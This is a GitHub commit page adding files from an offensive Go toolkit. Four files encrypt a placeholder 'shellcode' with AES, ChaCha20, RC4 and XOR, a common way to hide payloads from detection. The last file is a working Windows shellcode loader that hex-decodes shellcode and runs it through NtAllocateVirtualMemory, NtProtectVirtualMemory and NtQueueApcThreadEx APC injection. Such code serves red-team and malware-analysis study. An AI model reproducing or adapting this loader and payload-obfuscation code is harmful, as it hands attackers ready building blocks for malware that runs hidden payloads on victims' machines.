Add files via upload

CREDITS TO : https://github.com/Enelg52/OffensiveGo
come2darkside · Jun 10, 2024 · 7fb5404 · 7fb5404
1 parent c4ff973
commit 7fb5404
Show file tree

Hide file tree

Showing 22 changed files with 1,622 additions and 0 deletions.
diff --git a/crypto/aes.go b/crypto/aes.go
@@ -0,0 +1,79 @@
+package main
+
+import (
+	"bytes"
+	"crypto/aes"
+	"crypto/cipher"
+	"fmt"
+	"log"
+)
+
+// Taken from : https://github.com/HZzz2/go-shellcode-loader/blob/main/go-sc.go
+
+// Example usage
+func main() {
+	shellcode := []byte("Im a shellcode")
+	// Key must be 16 bytes
+	key := []byte("OffensiveGolang1")
+
+	a := NewAes()
+	src, err := a.Encrypt(shellcode, key)
+	if err != nil {
+		log.Fatal("Error while encrypting AES : ", err)
+	}
+	fmt.Println("Encrypted shellcode: ", string(src))
+
+	out, err := a.Decrypt(src, key)
+	if err != nil {
+		log.Fatal("Error while encrypting AES : ", err)
+	}
+	fmt.Println("Decrypted shellcode: ", string(out))
+}
+
+type Aes struct{}
+
+func NewAes() *Aes {
+	return &Aes{}
+}
+
+// pad payload with to reach block size (PKCS#7 padding)
+func (a *Aes) pad(str []byte, blockSize int) []byte {
+	paddingCount := blockSize - len(str)%blockSize
+	paddingStr := bytes.Repeat([]byte{byte(paddingCount)}, paddingCount)
+	newPaddingStr := append(str, paddingStr...)
+	return newPaddingStr
+}
+
+// Encrypt with AES-CBC
+func (a *Aes) Encrypt(src, key []byte) ([]byte, error) {
+	block, err := aes.NewCipher(key)
+	if err != nil {
+		return nil, err
+	}
+	src = a.pad(src, block.BlockSize())
+	blockMode := cipher.NewCBCEncrypter(block, key)
+	blockMode.CryptBlocks(src, src)
+	return src, nil
+
+}
+
+// Unpad payload
+func (a *Aes) unPad(str []byte) []byte {
+	n := len(str)
+	count := int(str[n-1])
+	newPaddingText := str[:n-count]
+	return newPaddingText
+}
+
+// Decrypt with AES-CBC
+func (a *Aes) Decrypt(src, key []byte) ([]byte, error) {
+	block, err := aes.NewCipher(key)
+	if err != nil {
+		fmt.Println(err)
+		return nil, err
+	}
+	blockMode := cipher.NewCBCDecrypter(block, key)
+	blockMode.CryptBlocks(src, src)
+	src = a.unPad(src)
+	return src, nil
+}
diff --git a/crypto/chacha20.go b/crypto/chacha20.go
@@ -0,0 +1,83 @@
+package main
+
+import (
+	"crypto/cipher"
+	"errors"
+	"fmt"
+	"golang.org/x/crypto/chacha20poly1305"
+	"log"
+)
+
+//https://github.com/alinz/crypto.go/blob/main/chacha20.go
+
+func main() {
+	shellcode := []byte("Im a shellcode")
+	// Key must be 32 bytes
+	key := []byte("OffensiveGolang1OffensiveGolang1")
+
+	chacha := NewChaCha20()
+	src, err := chacha.Encrypt(shellcode, key)
+	if err != nil {
+		log.Fatal("Error while encrypting chacha20 : ", err)
+	}
+	fmt.Println("Encrypted shellcode: ", string(src))
+
+	out, err := chacha.Decrypt(src, key)
+	if err != nil {
+		log.Fatal("Error while decrypting chacha20 : ", err)
+	}
+	fmt.Println("Decrypted shellcode: ", string(out))
+}
+
+type ChaCha20 struct{}
+
+func NewChaCha20() *ChaCha20 {
+	return &ChaCha20{}
+}
+
+func (c *ChaCha20) prepareKey(key []byte) (cipher.AEAD, int, error) {
+	aead, err := chacha20poly1305.NewX(key)
+	if err != nil {
+		return nil, 0, err
+	}
+	return aead, aead.NonceSize(), nil
+}
+
+// Encrypt encrypts data using given key
+func (c *ChaCha20) Encrypt(data []byte, key []byte) ([]byte, error) {
+	aead, nonceSize, err := c.prepareKey(key)
+	if err != nil {
+		return nil, err
+	}
+
+	// Select a random nonce, and leave capacity for the ciphertext.
+	nonce := make([]byte, nonceSize, nonceSize+len(data)+aead.Overhead())
+
+	// Encrypt the message and append the ciphertext to the nonce.
+	return aead.Seal(nonce, nonce, data, nil), nil
+}
+
+// DecryptChaCha decrypts data using given key
+func (c *ChaCha20) Decrypt(data []byte, key []byte) ([]byte, error) {
+	aead, nonceSize, err := c.prepareKey(key)
+	if err != nil {
+		return nil, err
+	}
+
+	if len(data) < nonceSize {
+		return nil, errors.New("ciphertext too short")
+	}
+
+	// Split nonce and ciphertext.
+	nonce, ciphertext := data[:nonceSize], data[nonceSize:]
+
+	// Decrypt the message and check it wasn't tampered with.
+	plaintext, err := aead.Open(nil, nonce, ciphertext, nil)
+	if err != nil {
+		if err.Error() == "chacha20poly1305: message authentication failed" {
+			return nil, errors.New("wrong key")
+		}
+		return nil, err
+	}
+	return plaintext, nil
+}
diff --git a/crypto/rc4.go b/crypto/rc4.go
@@ -0,0 +1,62 @@
+package main
+
+import (
+	"crypto/rc4"
+	"fmt"
+	"log"
+)
+
+// Taken from : https://github.com/firdasafridi/gocrypt/blob/main/rc4.go
+
+// Example usage
+func main() {
+	shellcode := []byte("Im a shellcode")
+	// Key must be 16 bytes
+	key := []byte("OffensiveGolang1")
+
+	r := NewRC4()
+	enc, err := r.Encrypt(shellcode, key)
+	if err != nil {
+		log.Fatal("Error while encrypting rc4: ", err)
+	}
+	fmt.Println("Encrypted shellcode:", string(enc))
+	plain, err := r.Decrypt(enc, key)
+	if err != nil {
+		log.Fatal("Error while decrypting rc4: ", err)
+	}
+	fmt.Println("Decrypted shellcode:", string(plain))
+}
+
+// RC4 is the aes option structure
+type RC4 struct {
+}
+
+// NewRC4 is a function to create new configuration of aes algorithm option
+// the secret must be hexa a-f & 0-9
+func NewRC4() *RC4 {
+	return &RC4{}
+}
+
+// Encrypt encrypts the first block in src into dst.
+// Dst and src may point at the same memory.
+func (rc4Opt *RC4) Encrypt(src []byte, key []byte) ([]byte, error) {
+	cipher, err := rc4.NewCipher(key)
+	if err != nil {
+		return nil, err
+	}
+	dst := make([]byte, len(src))
+	cipher.XORKeyStream(dst, src)
+	return dst, nil
+}
+
+// Decrypt decrypts the first block in src into dst.
+// Dst and src may point at the same memory.
+func (rc4Opt *RC4) Decrypt(src []byte, key []byte) ([]byte, error) {
+	cipher, err := rc4.NewCipher(key)
+	if err != nil {
+		return nil, err
+	}
+	dst := make([]byte, len(src))
+	cipher.XORKeyStream(dst, src)
+	return dst, nil
+}
diff --git a/crypto/xor.go b/crypto/xor.go
@@ -0,0 +1,24 @@
+package main
+
+import (
+	"fmt"
+)
+
+// Example usage
+func main() {
+	// Calc
+	shellcode := []byte("Im a shellcode")
+	// Xor shellcode with key
+	key := []byte("key")
+	enc := Xor(shellcode, key)
+	fmt.Println("Encrypted shellcode:", string(enc))
+	out := Xor(shellcode, key)
+	fmt.Println("Decrypted shellcode:", string(out))
+}
+
+func Xor(data []byte, key []byte) []byte {
+	for i := 0; i < len(data); i++ {
+		data[i] ^= key[i%len(key)]
+	}
+	return data
+}
diff --git a/injection_native_apc/main.go b/injection_native_apc/main.go
@@ -0,0 +1,83 @@
+package main
+
+//Inspired from :
+//https://github.com/C-Sto/BananaPhone/blob/master/example/calcshellcode/main.go
+//https://github.com/Ne0nd0g/go-shellcode/blob/master/cmd/NtQueueApcThreadEx-Local/main.go
+
+import (
+	"encoding/hex"
+	"fmt"
+	"golang.org/x/sys/windows"
+	"log"
+	"unsafe"
+)
+
+// https://docs.microsoft.com/en-us/windows/win32/midl/enum
+const (
+	QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC = 1
+)
+
+//Inspired from : https://github.com/C-Sto/BananaPhone/blob/master/example/calcshellcode/main.go
+
+func main() {
+	shellcode, _ := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3")
+
+	ntdll := windows.NewLazySystemDLL("ntdll.dll")
+	ntAllocateVirtualMemory := ntdll.NewProc("NtAllocateVirtualMemory")
+	ntProtectVirtualMemory := ntdll.NewProc("NtProtectVirtualMemory")
+	NtQueueApcThreadEx := ntdll.NewProc("NtQueueApcThreadEx")
+
+	var baseA uintptr
+	var handle = uintptr(0xffffffffffffffff)
+	var oldprotect uintptr
+
+	shellcodeSize := uintptr(len(shellcode))
+
+	//https://www.pinvoke.net/default.aspx/ntdll.NtAllocateVirtualMemory
+	_, _, err := ntAllocateVirtualMemory.Call( //NtAllocateVirtualMemory
+		handle,
+		uintptr(unsafe.Pointer(&baseA)),
+		0,
+		uintptr(unsafe.Pointer(&shellcodeSize)),
+		windows.MEM_COMMIT|windows.MEM_RESERVE,
+		windows.PAGE_READWRITE,
+	)
+	if err.Error() != "The operation completed successfully." {
+		log.Fatal("Error calling ntAllocateVirtualMemory:", err)
+	}
+	memcpy(baseA, shellcode)
+
+	//https://www.pinvoke.net/default.aspx/ntdll.NtProtectVirtualMemory
+	_, _, err = ntProtectVirtualMemory.Call( //NtProtectVirtualMemory
+		handle,
+		uintptr(unsafe.Pointer(&baseA)),
+		uintptr(unsafe.Pointer(&shellcodeSize)),
+		windows.PAGE_EXECUTE_READ,
+		uintptr(unsafe.Pointer(&oldprotect)),
+	)
+	if err.Error() != "The operation completed successfully." {
+		log.Fatal("Error calling ntProtectVirtualMemory:", err)
+	}
+
+	thread := windows.CurrentThread()
+
+	//http://www.pinvoke.net/default.aspx/ntdll/NtQueueApcThreadEx.html?diff=y
+	_, _, err = NtQueueApcThreadEx.Call(
+		uintptr(thread),
+		QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC,
+		baseA,
+		0,
+		0,
+		0,
+	)
+	if err.Error() != "The operation completed successfully." {
+		log.Fatal(fmt.Sprintf("Error calling NtQueueApcThreadEx:\n%s", err))
+	}
+}
+
+// memcpy in golang from https://github.com/timwhitez/Doge-Gabh/blob/main/example/shellcodecalc/calc.go
+func memcpy(base uintptr, buf []byte) {
+	for i := 0; i < len(buf); i++ {
+		*(*byte)(unsafe.Pointer(base + uintptr(i))) = buf[i]
+	}
+}